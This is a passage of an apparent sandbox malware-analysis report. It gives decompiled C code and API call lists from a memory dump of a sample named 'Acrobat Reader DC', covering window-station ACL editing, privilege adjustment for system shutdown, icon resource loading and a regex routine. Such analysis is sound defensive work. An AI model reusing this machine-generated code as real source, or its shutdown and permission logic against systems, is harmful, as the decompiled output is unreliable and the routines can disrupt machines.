                                  						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
                                  							_t117 = _t117 + 1;
                                  							if(_t117 < _v52) {
                                  								continue;
                                  							}
                                  							goto L12;
                                  						}
                                  					}
                                  					goto L20;
                                  				}
                                  			}



























                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                  • _memset.LIBCMT ref: 0044619F
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                  • SetUserObjectSecurity.USER32 ref: 004462D8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004333BE(int _a4, intOrPtr _a8) {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				struct _TOKEN_PRIVILEGES _v24;
                                  				int _t27;
                                  				int _t29;
                                  				int _t31;
                                  
                                  				_t29 = _a4;
                                  				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                  					L2:
                                  					return 0;
                                  				} else {
                                  					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges));
                                  					_v24.PrivilegeCount = 1;
                                  					_v12 = 2;
                                  					AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                  					if(GetLastError() == 0) {
                                  						if(_t29 == 0x20) {
                                  							return SetSystemPowerState(1, 0);
                                  						} else {
                                  							if(_t29 == 0x40) {
                                  								return SetSystemPowerState(0, 0);
                                  							} else {
                                  								if((_t29 & 0x0000000b) != 0) {
                                  									_t31 = 0;
                                  									if((_t29 & 0x00000014) != 0) {
                                  										_t31 = 1;
                                  									}
                                  									_t27 = 0;
                                  									if((_t29 & 0x00000002) != 0) {
                                  										_t27 = 1;
                                  									}
                                  									__imp__InitiateSystemShutdownExW(0, 0, 0, _t31, _t27, _a8);
                                  									return _t27;
                                  								} else {
                                  									return ExitWindowsEx(_t29, 0);
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}










                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                  • GetLastError.KERNEL32 ref: 00433414
                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 2938487562-3733053543
                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E0043305F(void* __edx, void* __edi, struct HINSTANCE__* _a4, int _a12, void* _a16) {
                                  				char _v16;
                                  				char _v28;
                                  				struct HRSRC__* _t27;
                                  				void* _t28;
                                  				void* _t29;
                                  				void* _t34;
                                  				BYTE* _t36;
                                  				int _t38;
                                  				signed char* _t43;
                                  				int _t49;
                                  				struct HRSRC__* _t61;
                                  				long _t63;
                                  				WCHAR* _t65;
                                  				struct HINSTANCE__* _t66;
                                  
                                  				_t65 = _a12;
                                  				E0041329B(__edx,  &_v16, L"%d", _t65);
                                  				E0041329B( &_v28,  &_v28, L"%d", _a16);
                                  				if(E004114AB(__edi,  &_v28,  &_v16) != 0) {
                                  					L2:
                                  					return 1;
                                  				} else {
                                  					_t66 = _a4;
                                  					_t27 = FindResourceW(_t66, _t65, 0xe);
                                  					if(_t27 != 0) {
                                  						_t28 = LoadResource(_t66, _t27);
                                  						if(_t28 == 0) {
                                  							goto L2;
                                  						} else {
                                  							_push(__edi);
                                  							_t29 = LockResource(_t28);
                                  							_a4 = _t29;
                                  							_a12 = 0;
                                  							if(0 >=  *((intOrPtr*)(_t29 + 4))) {
                                  								L15:
                                  								return 0;
                                  							} else {
                                  								_t11 = _t29 + 6; // 0x6
                                  								_t43 = _t11;
                                  								while(1) {
                                  									_t61 = FindResourceW(_t66, _t43[0xc] & 0x0000ffff, 3);
                                  									if(_t61 == 0) {
                                  										break;
                                  									}
                                  									_t34 = LoadResource(_t66, _t61);
                                  									_a16 = _t34;
                                  									if(_t34 == 0) {
                                  										break;
                                  									} else {
                                  										_t63 = SizeofResource(_t66, _t61);
                                  										_t36 = LockResource(_a16);
                                  										_t49 =  *0x497530;
                                  										if(( *_t43 & 0x000000ff) != _t49 || (_t43[1] & 0x000000ff) !=  *0x49752c || (_t43[6] & 0x0000ffff) !=  *0x497528) {
                                  											_t38 = _a12 + 1;
                                  											_t43 =  &(_t43[0xe]);
                                  											_a12 = _t38;
                                  											if(_t38 < ( *(_a4 + 4) & 0x0000ffff)) {
                                  												continue;
                                  											} else {
                                  												return 0;
                                  											}
                                  										} else {
                                  											 *0x497534 = CreateIconFromResourceEx(_t36, _t63, 1, 0x30000, _t49,  *0x49752c, 0);
                                  											goto L15;
                                  										}
                                  									}
                                  									goto L16;
                                  								}
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  				L16:
                                  			}


















                                  APIs
                                  • __swprintf.LIBCMT ref: 00433073
                                  • __swprintf.LIBCMT ref: 00433085
                                  • __wcsicoll.LIBCMT ref: 00433092
                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                  • LockResource.KERNEL32(?), ref: 00433120
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                  • String ID:
                                  • API String ID: 1158019794-0
                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E0044663B(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				signed int _v64;
                                  				intOrPtr _v68;
                                  				intOrPtr _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				intOrPtr _v84;
                                  				signed int* _v88;
                                  				signed int _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				signed int _v104;
                                  				signed int _v108;
                                  				signed int _v112;
                                  				signed int _v116;
                                  				signed int _v120;
                                  				signed int _v124;
                                  				signed int _v128;
                                  				signed int _v132;
                                  				signed int _v136;
                                  				signed int _v140;
                                  				signed int _v144;
                                  				intOrPtr _v148;
                                  				intOrPtr _v152;
                                  				signed int _v155;
                                  				signed int _v156;
                                  				intOrPtr _v160;
                                  				signed int _v164;
                                  				signed int _v168;
                                  				signed int _v172;
                                  				signed int _v176;
                                  				intOrPtr _v180;
                                  				signed int _v184;
                                  				void* _v188;
                                  				intOrPtr _v192;
                                  				intOrPtr _v196;
                                  				signed int _v200;
                                  				signed int _v204;
                                  				signed int _v208;
                                  				signed int _v212;
                                  				signed int _v216;
                                  				signed int _v220;
                                  				signed int _v224;
                                  				signed int _v228;
                                  				signed int _v232;
                                  				signed int _v236;
                                  				signed int _v240;
                                  				char _v280;
                                  				char _v324;
                                  				signed int _t327;
                                  				signed int _t334;
                                  				signed char _t335;
                                  				signed int _t343;
                                  				signed int _t366;
                                  				signed int _t368;
                                  				signed int _t371;
                                  				unsigned int _t372;
                                  				signed int _t380;
                                  				signed int _t387;
                                  				signed int _t389;
                                  				signed int _t391;
                                  				signed int _t393;
                                  				signed int _t394;
                                  				signed int _t400;
                                  				signed int _t402;
                                  				signed int _t404;
                                  				signed int _t406;
                                  				signed int _t407;
                                  				signed int _t410;
                                  				signed int _t412;
                                  				int _t413;
                                  				signed int _t418;
                                  				signed int _t419;
                                  				signed int _t421;
                                  				signed int _t428;
                                  				unsigned int _t430;
                                  				signed int _t432;
                                  				signed int _t434;
                                  				void* _t439;
                                  				signed int _t445;
                                  				signed int _t447;
                                  				signed int _t448;
                                  				signed int _t454;
                                  				signed int _t461;
                                  				signed int _t462;
                                  				signed int _t463;
                                  				signed int _t466;
                                  				intOrPtr _t468;
                                  				signed int _t471;
                                  				signed int _t476;
                                  				signed int _t477;
                                  				signed int _t487;
                                  				signed int _t489;
                                  				signed int _t504;
                                  				signed int _t505;
                                  				signed int _t510;
                                  				signed int _t522;
                                  				signed int _t526;
                                  				signed int _t527;
                                  				signed int _t528;
                                  				intOrPtr* _t529;
                                  				signed int _t532;
                                  				signed int _t548;
                                  				signed int _t550;
                                  				void* _t552;
                                  				unsigned int _t555;
                                  				signed int _t559;
                                  				signed int _t560;
                                  				signed int _t566;
                                  				signed int _t567;
                                  				void* _t568;
                                  				signed int _t569;
                                  				signed int _t570;
                                  				signed int* _t572;
                                  				signed int _t574;
                                  				intOrPtr* _t576;
                                  				intOrPtr* _t578;
                                  				intOrPtr _t579;
                                  				signed int _t580;
                                  				void* _t582;
                                  				intOrPtr* _t583;
                                  				intOrPtr _t584;
                                  				signed int _t585;
                                  				signed int _t586;
                                  				signed int _t590;
                                  				signed int _t591;
                                  				void* _t592;
                                  
                                  				_t327 = _a16;
                                  				_t510 = _a8;
                                  				_t462 = _a20;
                                  				_t585 = _a4;
                                  				_t560 = _t559 | 0xffffffff;
                                  				_v28 = _t560;
                                  				_v228 = _t560;
                                  				_v204 = _t560;
                                  				_t461 = _t510 + _t327;
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				_v224 = 0;
                                  				_v20 = 0;
                                  				_v216 = _t461 - 1;
                                  				if((_t462 & 0xe20f5a6f) == 0) {
                                  					__eflags = _t585;
                                  					if(_t585 == 0) {
                                  						L228:
                                  						return 0xfffffffe;
                                  					}
                                  					__eflags = _t510;
                                  					if(_t510 == 0) {
                                  						goto L228;
                                  					}
                                  					__eflags = _a24;
                                  					if(_a24 == 0) {
                                  						__eflags = _a28;
                                  						if(_a28 > 0) {
                                  							goto L228;
                                  						}
                                  					}
                                  					__eflags = _a28;
                                  					if(_a28 >= 0) {
                                  						__eflags = _t327;
                                  						if(_t327 < 0) {
                                  							L227:
                                  							return 0xffffffe8;
                                  						} else {
                                  							__eflags = _t327 - _a12;
                                  							if(_t327 > _a12) {
                                  								goto L227;
                                  							} else {
                                  								_v160 = ( *(_t585 + 0x18) & 0x0000ffff) + _t585;
                                  								_v164 =  *(_t585 + 0x1a) & 0x0000ffff;
                                  								_v196 = 0x989680;
                                  								_v192 = 0x989680;
                                  								_t334 =  *(_t585 + 0x20);
                                  								_v168 =  *(_t585 + 0x1c) & 0x0000ffff;
                                  								_v48 = 0;
                                  								_v12 = _t334;
                                  								__eflags = _t334;
                                  								if(_t334 == 0) {
                                  									_v12 = 0x486a58;
                                  								}
                                  								__eflags =  *_t585 - 0x50435245;
                                  								if(__eflags == 0) {
                                  									L16:
                                  									_t335 =  *(_t585 + 8);
                                  									_v208 = _t335 >> 0x00000012 & 0x00000001;
                                  									_v212 = (_t462 & 0x000000ff | _t335 & 0x000000ff) >> 0x00000004 & 0x00000001;
                                  									_v232 = ( *(_t585 + 0xc) & 0x000000ff) >> 0x00000003 & 0x00000001;
                                  									_t522 = _a8;
                                  									_v100 = ( *(_t585 + 0x18) & 0x0000ffff) + ( *(_t585 + 0x1c) & 0x0000ffff) * ( *(_t585 + 0x1a) & 0x0000ffff) + _a4;
                                  									_v64 = _a16;
                                  									_t343 = _a12 + _t522;
                                  									_v92 = _t343;
                                  									_a4 = _t343;
                                  									_v96 = _t522;
                                  									_v120 = ( *(_t585 + 8) & 0x000000ff) >> 0x00000005 & 0x00000001;
                                  									_t566 =  *(_t585 + 8) >> 0x0000000b & 0x00000001;
                                  									_v132 = _t566;
                                  									_v124 =  *(_t585 + 8) >> 0x0000001d & 0x00000001;
                                  									_v128 =  *(_t585 + 8) >> 0x00000019 & 0x00000001;
                                  									__eflags = _t462 & 0x00000080;
                                  									_v16 = _t566;
                                  									_v140 = 0 | (_t462 & 0x00000080) != 0x00000000;
                                  									_v136 = _t462 >> 0x00000008 & 0x00000001;
                                  									_v116 = _t462 >> 0x0000000a & 0x00000001;
                                  									_v112 = _t462 >> 0x0000001c & 0x00000001;
                                  									__eflags = _t462 & 0x08000000;
                                  									if((_t462 & 0x08000000) == 0) {
                                  										_t366 = _t462 >> 0x0000000f & 0x00000001;
                                  										__eflags = _t366;
                                  									} else {
                                  										_t366 = 2;
                                  									}
                                  									_v76 = _t366;
                                  									_v108 = 0;
                                  									_v44 = 0;
                                  									_v52 = 0;
                                  									_t368 = _v12;
                                  									_v152 = _t368;
                                  									_v148 = _t368 + 0x340;
                                  									_t371 = _t462 & 0x01800000;
                                  									__eflags = _t371;
                                  									if(_t371 == 0) {
                                  										_t372 =  *(_t585 + 8);
                                  										__eflags = _t372 & 0x01800000;
                                  										if((_t372 & 0x01800000) == 0) {
                                  											goto L26;
                                  										} else {
                                  											_v104 = _t372 >> 0x00000017 & 0x00000001;
                                  										}
                                  										goto L27;
                                  									} else {
                                  										__eflags = _t371 - 0x800000;
                                  										if(_t371 == 0x800000) {
                                  											_v104 = 1;
                                  											L27:
                                  											__eflags = _t462 & 0x00700000;
                                  											if((_t462 & 0x00700000) == 0) {
                                  												_t462 =  *(_t585 + 8);
                                  											}
                                  											_t463 = _t462 & 0x00700000;
                                  											__eflags = _t463 - 0x300000;
                                  											if(__eflags > 0) {
                                  												__eflags = _t463 - 0x400000;
                                  												if(_t463 == 0x400000) {
                                  													_v176 = 1;
                                  													goto L44;
                                  												} else {
                                  													__eflags = _t463 - 0x500000;
                                  													if(_t463 != 0x500000) {
                                  														goto L22;
                                  													} else {
                                  														_v176 = 2;
                                  														goto L44;
                                  													}
                                  												}
                                  											} else {
                                  												if(__eflags == 0) {
                                  													_t454 = 0xd0a;
                                  													goto L35;
                                  												} else {
                                  													__eflags = _t463;
                                  													if(_t463 == 0) {
                                  														L34:
                                  														_t454 = 0xa;
                                  														goto L35;
                                  													} else {
                                  														__eflags = _t463 - 0x100000;
                                  														if(_t463 == 0x100000) {
                                  															_t454 = 0xd;
                                  															L35:
                                  															_v176 = 0;
                                  															__eflags = _t454 - 0xff;
                                  															if(_t454 <= 0xff) {
                                  																_v172 = 1;
                                  																_v156 = _t454;
                                  															} else {
                                  																_v172 = 2;
                                  																_v156 = _t454 >> 8;
                                  																_v155 = _t454;
                                  															}
                                  															L44:
                                  															__eflags = _v76;
                                  															if(_v76 == 0) {
                                  																L47:
                                  																__eflags = _t566;
                                  																if(_t566 == 0) {
                                  																	L57:
                                  																	_v240 =  *(_t585 + 8) & 0x00000007;
                                  																	_t567 = (0x55555556 * _a28 >> 0x20 >> 0x1f) + (0x55555556 * _a28 >> 0x20) + ((0x55555556 * _a28 >> 0x20 >> 0x1f) + (0x55555556 * _a28 >> 0x20)) * 2;
                                  																	_t380 =  *(_t585 + 0x12) & 0x0000ffff;
                                  																	__eflags = _t380;
                                  																	if(_t380 == 0) {
                                  																		L62:
                                  																		_v188 = _a24;
                                  																		goto L63;
                                  																	} else {
                                  																		_t505 = _t380;
                                  																		_t555 = 0x55555556 * _t567 >> 0x20;
                                  																		__eflags = _t505 - (_t555 >> 0x1f) + _t555;
                                  																		if(_t505 < (_t555 >> 0x1f) + _t555) {
                                  																			goto L62;
                                  																		} else {
                                  																			_t567 = _t505 + 3 + _t505 * 2;
                                  																			_t445 =  *0x491490(_t567 * 4);
                                  																			_t592 = _t592 + 4;
                                  																			_v188 = _t445;
                                  																			__eflags = _t445;
                                  																			if(_t445 != 0) {
                                  																				_v32 = 1;
                                  																				L63:
                                  																				_v184 = _t567;
                                  																				_v180 = (0x55555556 * (_t567 + _t567) >> 0x20 >> 0x1f) + (0x55555556 * (_t567 + _t567) >> 0x20);
                                  																				_v144 = 0;
                                  																				_v68 = 0xffffffff;
                                  																				_t466 = ( *(_t585 + 0x10) & 0x0000ffff) + ( *(_t585 + 0x10) & 0x0000ffff) + 2;
                                  																				_v220 = _t466;
                                  																				__eflags = _t466 - _a28;
                                  																				if(_t466 > _a28) {
                                  																					_t466 = _t567;
                                  																					_v220 = _t567;
                                  																				}
                                  																				__eflags = _v188;
                                  																				if(_v188 != 0) {
                                  																					_t552 = _v188;
                                  																					_t582 = _t552 + _t567 * 4;
                                  																					asm("cdq");
                                  																					_t439 = _t582 + (1 - (_t466 - _t552 >> 1)) * 4;
                                  																					_t583 = _t582 - 4;
                                  																					__eflags = _t583 - _t439;
                                  																					while(_t583 >= _t439) {
                                  																						 *_t583 = 0xffffffff;
                                  																						_t583 = _t583 - 4;
                                  																						__eflags = _t583 - _t439;
                                  																					}
                                  																				}
                                  																				__eflags = _v212;
                                  																				if(_v212 == 0) {
                                  																					__eflags =  *(_t585 + 0xc) & 0x00000002;
                                  																					if(( *(_t585 + 0xc) & 0x00000002) != 0) {
                                  																						_t434 =  *(_t585 + 0x14) & 0x0000ffff;
                                  																						_t550 = _t434 & 0x000000ff;
                                  																						_v28 = _t550;
                                  																						__eflags = _t434 & 0x00000100;
                                  																						if((_t434 & 0x00000100) == 0) {
                                  																							_v36 = 0;
                                  																						} else {
                                  																							_v36 = 1;
                                  																							_v28 =  *(_v152 + _t550) & 0x000000ff;
                                  																						}
                                  																					}
                                  																				}
                                  																				__eflags =  *(_t585 + 0xc) & 0x00000004;
                                  																				if(( *(_t585 + 0xc) & 0x00000004) != 0) {
                                  																					_t430 =  *(_t585 + 0x16) & 0x0000ffff;
                                  																					_t548 = _t430 & 0x000000ff;
                                  																					_t432 = _t430 >> 0x00000008 & 0x00000001;
                                  																					__eflags = _t432;
                                  																					_v224 = _t432;
                                  																					_v228 = _t548;
                                  																					_v204 =  *(_v12 + _t548 + 0x100) & 0x000000ff;
                                  																				}
                                  																				_t387 = _a20 & 0x04000000;
                                  																				__eflags = _t387;
                                  																				_v236 = _t387;
                                  																				while(1) {
                                  																					L75:
                                  																					_t568 = _v188;
                                  																					_t526 = _a4;
                                  																					_v24 = _t526;
                                  																					__eflags = _t568;
                                  																					if(_t568 != 0) {
                                  																						_t412 = _t568 + _t466 * 4;
                                  																						__eflags = _t568 - _t412;
                                  																						if(_t568 < _t412) {
                                  																							_t413 = _t412 | 0xffffffff;
                                  																							__eflags = _t413;
                                  																							memset(_t568, _t413, (_t412 - _t568 - 1 >> 2) + 1 << 2);
                                  																							_t592 = _t592 + 0xc;
                                  																						}
                                  																					}
                                  																					__eflags = _v208;
                                  																					if(_v208 == 0) {
                                  																						goto L104;
                                  																					}
                                  																					__eflags = _v16;
                                  																					_t404 = _v92;
                                  																					_t580 = _t461;
                                  																					if(_v16 == 0) {
                                  																						__eflags = _t461 - _t404;
                                  																						if(_t461 < _t404) {
                                  																							do {
                                  																								__eflags = _v176;
                                  																								if(_v176 == 0) {
                                  																									_t489 = _v172;
                                  																									__eflags = _t580 - _t404 - _t489;
                                  																									if(_t580 > _t404 - _t489) {
                                  																										goto L102;
                                  																									} else {
                                  																										__eflags =  *_t580 - _v156;
                                  																										if( *_t580 != _v156) {
                                  																											goto L102;
                                  																										} else {
                                  																											__eflags = _t489 - 1;
                                  																											if(_t489 != 1) {
                                  																												__eflags =  *(_t580 + 1) - _v155;
                                  																												if( *(_t580 + 1) != _v155) {
                                  																													goto L102;
                                  																												}
                                  																											}
                                  																										}
                                  																									}
                                  																								} else {
                                  																									_t406 = E0042E9B5(_t580, _v176, _v92,  &_v172, 0);
                                  																									_t592 = _t592 + 0x14;
                                  																									__eflags = _t406;
                                  																									if(_t406 == 0) {
                                  																										_t404 = _v92;
                                  																										goto L102;
                                  																									}
                                  																								}
                                  																								goto L103;
                                  																								L102:
                                  																								_t580 = _t580 + 1;
                                  																								__eflags = _t580 - _t404;
                                  																							} while (_t580 < _t404);
                                  																						}
                                  																					} else {
                                  																						__eflags = _t461 - _t404;
                                  																						if(_t461 < _t404) {
                                  																							do {
                                  																								__eflags = _v176;
                                  																								if(_v176 == 0) {
                                  																									_t407 = _v172;
                                  																									__eflags = _t580 - _t404 - _t407;
                                  																									if(_t580 > _t404 - _t407) {
                                  																										goto L89;
                                  																									} else {
                                  																										__eflags =  *_t580 - _v156;
                                  																										if( *_t580 != _v156) {
                                  																											goto L89;
                                  																										} else {
                                  																											__eflags = _t407 - 1;
                                  																											if(_t407 != 1) {
                                  																												__eflags =  *(_t580 + 1) - _v155;
                                  																												if( *(_t580 + 1) != _v155) {
                                  																													goto L89;
                                  																												}
                                  																											}
                                  																										}
                                  																									}
                                  																								} else {
                                  																									_t410 = E0042E9B5(_t580, _v176, _v92,  &_v172, _v16);
                                  																									_t592 = _t592 + 0x14;
                                  																									__eflags = _t410;
                                  																									if(_t410 == 0) {
                                  																										_t526 = _a4;
                                  																										L89:
                                  																										_t580 = _t580 + 1;
                                  																										__eflags = _t580 - _t526;
                                  																										if(_t580 < _t526) {
                                  																											while(1) {
                                  																												__eflags = ( *_t580 & 0x000000c0) - 0x80;
                                  																												if(( *_t580 & 0x000000c0) != 0x80) {
                                  																													goto L92;
                                  																												}
                                  																												_t580 = _t580 + 1;
                                  																												__eflags = _t580 - _t526;
                                  																												if(_t580 < _t526) {
                                  																													continue;
                                  																												}
                                  																												goto L92;
                                  																											}
                                  																										}
                                  																										goto L92;
                                  																									}
                                  																								}
                                  																								goto L103;
                                  																								L92:
                                  																								_t404 = _v92;
                                  																								__eflags = _t580 - _t404;
                                  																							} while (_t580 < _t404);
                                  																						}
                                  																					}
                                  																					L103:
                                  																					_t526 = _t580;
                                  																					_a4 = _t526;
                                  																					L104:
                                  																					_t389 =  *(_t585 + 8) | _a20;
                                  																					__eflags = _t389 & 0x04000000;
                                  																					if((_t389 & 0x04000000) == 0) {
                                  																						_t418 = _v28;
                                  																						__eflags = _t418;
                                  																						if(_t418 < 0) {
                                  																							__eflags = _v232;
                                  																							if(_v232 != 0) {
                                  																								__eflags = _t461 - _v96 + _a16;
                                  																								if(_t461 > _v96 + _a16) {
                                  																									__eflags = _v16;
                                  																									if(_v16 == 0) {
                                  																										__eflags = _t461 - _t526;
                                  																										while(_t461 < _t526) {
                                  																											__eflags = _v176;
                                  																											if(_v176 == 0) {
                                  																												__eflags = _t461 - _v172 + _v96;
                                  																												if(_t461 < _v172 + _v96) {
                                  																													goto L144;
                                  																												} else {
                                  																													_t576 = _t461 - _v172;
                                  																													__eflags =  *_t576 - _v156;
                                  																													if( *_t576 != _v156) {
                                  																														goto L144;
                                  																													} else {
                                  																														__eflags = _v172 - 1;
                                  																														if(_v172 != 1) {
                                  																															__eflags =  *((intOrPtr*)(_t576 + 1)) - _v155;
                                  																															if( *((intOrPtr*)(_t576 + 1)) != _v155) {
                                  																																goto L144;
                                  																															}
                                  																														}
                                  																													}
                                  																												}
                                  																											} else {
                                  																												__eflags = _t461 - _v96;
                                  																												if(_t461 <= _v96) {
                                  																													goto L144;
                                  																												} else {
                                  																													_t421 = E0042E7E1(_t461, _v176, _v96,  &_v172, 0);
                                  																													_t526 = _a4;
                                  																													_t592 = _t592 + 0x14;
                                  																													__eflags = _t421;
                                  																													if(_t421 == 0) {
                                  																														goto L144;
                                  																													}
                                  																												}
                                  																											}
                                  																											goto L145;
                                  																											L144:
                                  																											_t461 = _t461 + 1;
                                  																											__eflags = _t461 - _t526;
                                  																										}
                                  																									} else {
                                  																										__eflags = _t461 - _t526;
                                  																										while(_t461 < _t526) {
                                  																											__eflags = _v176;
                                  																											if(_v176 == 0) {
                                  																												__eflags = _t461 - _v172 + _v96;
                                  																												if(_t461 < _v172 + _v96) {
                                  																													goto L129;
                                  																												} else {
                                  																													_t578 = _t461 - _v172;
                                  																													__eflags =  *_t578 - _v156;
